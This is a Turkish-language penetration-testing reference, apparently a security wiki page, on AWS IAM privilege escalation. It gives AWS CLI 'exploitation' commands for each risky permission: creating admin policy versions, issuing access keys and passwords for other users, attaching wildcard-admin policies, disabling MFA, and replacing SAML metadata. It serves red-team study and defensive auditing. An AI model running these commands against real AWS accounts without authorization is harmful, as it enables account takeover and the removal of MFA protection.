AWS - IAM Privesc

IAM

IAM hakkında daha fazla bilgi için kontrol edin:

iam:CreatePolicyVersion

Yeni bir IAM politika versiyonu oluşturma yetkisi verir, --set-as-default bayrağını kullanarak iam:SetDefaultPolicyVersion iznine ihtiyaç duymadan. Bu, özel izinlerin tanımlanmasını sağlar.

Sömürü Komutu:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Etkisi: Herhangi bir kaynak üzerinde herhangi bir eyleme izin vererek doğrudan ayrıcalıkları yükseltir.

iam:SetDefaultPolicyVersion

Bir IAM politikasının varsayılan sürümünü başka bir mevcut sürüme değiştirmeye izin verir, eğer yeni sürüm daha fazla izin içeriyorsa ayrıcalıkları yükseltme potansiyeli taşır.

Bash Komutu:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Etkisi: Daha fazla izin vererek dolaylı yetki yükseltme.

iam:CreateAccessKey

Başka bir kullanıcı için erişim anahtarı kimliği ve gizli erişim anahtarı oluşturulmasını sağlar, bu da potansiyel yetki yükseltmeye yol açar.

Sömürü:

aws iam create-access-key --user-name <target_user>

Etkisi: Başka bir kullanıcının genişletilmiş izinlerini üstlenerek doğrudan yetki yükseltme.

iam:CreateLoginProfile | iam:UpdateLoginProfile

AWS konsoluna giriş için şifre ayarlamayı da içeren bir giriş profili oluşturma veya güncelleme izni verir, bu da doğrudan yetki yükseltmeye yol açar.

Oluşturma için Sömürü:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Güncelleme için Sömürü:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Etkisi: "herhangi" bir kullanıcı olarak oturum açarak doğrudan yetki yükseltme.

iam:UpdateAccessKey

Devre dışı bırakılmış bir erişim anahtarını etkinleştirmeye izin verir, bu da saldırgan devre dışı anahtara sahipse yetkisiz erişime yol açabilir.

Sömürü:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Etkisi: Erişim anahtarlarını yeniden etkinleştirerek doğrudan yetki yükseltme.

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

Belirli AWS hizmetleri için kimlik bilgileri oluşturma veya sıfırlama yetkisi verir (örneğin, CodeCommit, Amazon Keyspaces), ilişkili kullanıcının izinlerini devralır.

Oluşturma için Sömürü:

aws iam create-service-specific-credential --user-name <username> --service-name <service>

Sıfırlama için İstismar:

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Etkisi: Kullanıcının hizmet izinleri içinde doğrudan yetki yükseltme.

iam:AttachUserPolicy || iam:AttachGroupPolicy

Politikaların kullanıcılara veya gruplara eklenmesine izin verir, eklenen politikanın izinlerini miras alarak doğrudan yetki yükseltir.

Kullanıcı için Sömürü:

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Grup için Sömürü:

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Etkisi: Politikanın verdiği her şeye doğrudan yetki yükseltme.

iam:AttachRolePolicy, ( sts:AssumeRole|iam:createrole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy

Rollere, kullanıcılara veya gruplara politikalar eklemeye veya koymaya izin verir, ek izinler vererek doğrudan yetki yükseltmeyi mümkün kılar.

Rol için Sömürü:

aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

Satır İçi Politikalara Saldırı:

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

Bir politika kullanabilirsiniz:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}

Etkisi: Politikalara izinler ekleyerek doğrudan yetki yükseltme.

iam:AddUserToGroup

Kendini bir IAM grubuna eklemeyi sağlar, grubun izinlerini miras alarak yetkileri yükseltir.

Sömürü:

aws iam add-user-to-group --group-name <group_name> --user-name <username>

Etkisi: Grubun izin seviyesine doğrudan yetki yükseltme.

iam:UpdateAssumeRolePolicy

Bir rolün varsayılan rol politikası belgesini değiştirmeye izin verir, böylece rolün ve onunla ilişkili izinlerin üstlenilmesini sağlar.

Sömürü:

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

Aşağıdaki gibi görünen bir politika, kullanıcıya rolü üstlenme izni verir:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

Etkisi: Herhangi bir rolün izinlerini üstlenerek doğrudan yetki yükseltme.

iam:UploadSSHPublicKey || iam:DeactivateMFADevice

CodeCommit'e kimlik doğrulamak için bir SSH genel anahtarı yüklemeye ve MFA cihazlarını devre dışı bırakmaya izin verir, bu da potansiyel dolaylı yetki yükseltmeye yol açar.

SSH Anahtarı Yükleme için Sömürü:

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

MFA Devre Dışı Bırakma Açığı:

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

Etkisi: CodeCommit erişimini etkinleştirerek veya MFA korumasını devre dışı bırakarak dolaylı ayrıcalık yükseltmesi.

iam:ResyncMFADevice

MFA cihazının yeniden senkronizasyonuna izin verir, bu da MFA korumasını manipüle ederek dolaylı ayrıcalık yükseltmesine yol açabilir.

Bash Komutu:

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Etkisi: MFA cihazlarını ekleyerek veya manipüle ederek dolaylı ayrıcalık yükseltme.

iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)

Bu izinlerle SAML bağlantısının XML meta verisini değiştirebilirsiniz. Ardından, SAML federasyonunu giriş yapmak için ona güvenen herhangi bir rol ile kötüye kullanabilirsiniz.

Bunu yapmanın meşru kullanıcıların giriş yapamayacağını unutmayın. Ancak, XML'i alabilir, kendi XML'inizi koyabilir, giriş yapabilir ve önceki ayarları yapılandırabilirsiniz.

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)

(Bu konuda emin değilim) Eğer bir saldırgan bu izinlere sahipse, sağlayıcıya güvenen tüm rollere giriş yapmak için yeni bir Parmak İzi ekleyebilir.

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

Referanslar

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/